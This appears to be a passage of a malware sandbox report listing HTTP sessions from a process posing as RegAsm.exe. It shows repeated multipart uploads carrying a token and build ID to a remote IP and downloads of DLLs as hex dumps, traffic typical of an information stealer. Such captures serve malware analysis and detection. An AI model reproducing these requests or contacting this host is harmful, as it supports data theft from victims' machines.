                                                                                    Data Ascii: ------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------EHIJJDGDHDGDAKFIECFIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------EHIJJDGDHDGDAKFIECFICont
                                                                                    2024-09-26 22:14:36 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:36 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:36 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.4497465.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:36 UTC193OUTGET /sqlp.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:37 UTC263INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:36 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 2459136
                                                                                    Connection: close
                                                                                    Last-Modified: Thursday, 26-Sep-2024 22:14:36 GMT
                                                                                    Cache-Control: no-store, no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    2024-09-26 22:14:37 UTC16121INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                    Data Ascii: %:X~e!*FW|>|L1146
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56
                                                                                    Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSV
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: f9 39 77 12 8d 1c 9b 46 8d 5b e8 8d 1c 59 0f be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89
                                                                                    Data Ascii: 9wF[Y0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: 4c 24 20 89 44 24 24 3b c2 7f 0c 7c 18 8b 44 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f
                                                                                    Data Ascii: L$ D$$;|D$;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: 7c 24 10 be 07 00 00 00 eb 32 c7 40 08 01 00 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                    Data Ascii: |$2@3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: 10 83 c4 04 85 f6 74 64 8b 7c 24 14 e9 68 fe ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                    Data Ascii: td|$hT$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: ff 83 c4 18 5f 5e 5d 5b 59 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3
                                                                                    Data Ascii: _^][YVt$W|$FVBhtw7t7Vg_^jjjh,g!t$
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: 89 4a 2c ff 46 2c 5e c3 8b 4c 24 0c 33 d2 8b 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3
                                                                                    Data Ascii: J,F,^L$3qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$
                                                                                    2024-09-26 22:14:37 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81
                                                                                    Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    8192.168.2.4497475.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:39 UTC278OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 4677
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:39 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 46 43 46 42 46 42 46 42 4b 46 49 44 48 4a 4b 46 43 41 46 43 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------FCFBFBFBKFIDHJKFCAFCContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------FCFBFBFBKFIDHJKFCAFCCont
                                                                                    2024-09-26 22:14:40 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:40 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:40 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    9192.168.2.4497485.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:40 UTC278OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----AAFIJKKEHJDHJKFIECAA
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 1529
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:40 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 46 49 4a 4b 4b 45 48 4a 44 48 4a 4b 46 49 45 43 41 41 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------AAFIJKKEHJDHJKFIECAAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AAFIJKKEHJDHJKFIECAACont
                                                                                    2024-09-26 22:14:41 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:41 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    10192.168.2.4497495.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:41 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----GDAAKKEHDHCAAAKFCBAK
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 437
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:41 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 44 41 41 4b 4b 45 48 44 48 43 41 41 41 4b 46 43 42 41 4b 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------GDAAKKEHDHCAAAKFCBAKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GDAAKKEHDHCAAAKFCBAKCont
                                                                                    2024-09-26 22:14:42 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:42 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    11192.168.2.4497505.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:43 UTC277OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----AFCBKFHJJJKKFHIDAAKF
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Content-Length: 437
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:43 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 66 64 64 34 66 66 38 62 38 62 39 66 36 66 64 65 34 64 30 39 61 64 65 62 34 65 36 62 39 39 63 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 42 4b 46 48 4a 4a 4a 4b 4b 46 48 49 44 41 41 4b 46 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="token"0fdd4ff8b8b9f6fde4d09adeb4e6b99c------AFCBKFHJJJKKFHIDAAKFContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------AFCBKFHJJJKKFHIDAAKFCont
                                                                                    2024-09-26 22:14:43 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:43 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2024-09-26 22:14:43 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    12192.168.2.4497515.75.211.162443396C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-09-26 22:14:44 UTC196OUTGET /freebl3.dll HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                    Host: 5.75.211.162
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2024-09-26 22:14:44 UTC262INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 26 Sep 2024 22:14:44 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 685392
                                                                                    Connection: close
                                                                                    Last-Modified: Thursday, 26-Sep-2024 22:14:44 GMT
                                                                                    Cache-Control: no-store, no-cache
                                                                                    Accept-Ranges: bytes
                                                                                    2024-09-26 22:14:44 UTC16122INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                    Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                    2024-09-26 22:14:44 UTC16384INData Raw: ff ff ff 13 bd 10 ff ff ff 01 c8 89 45 b4 11 df 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f
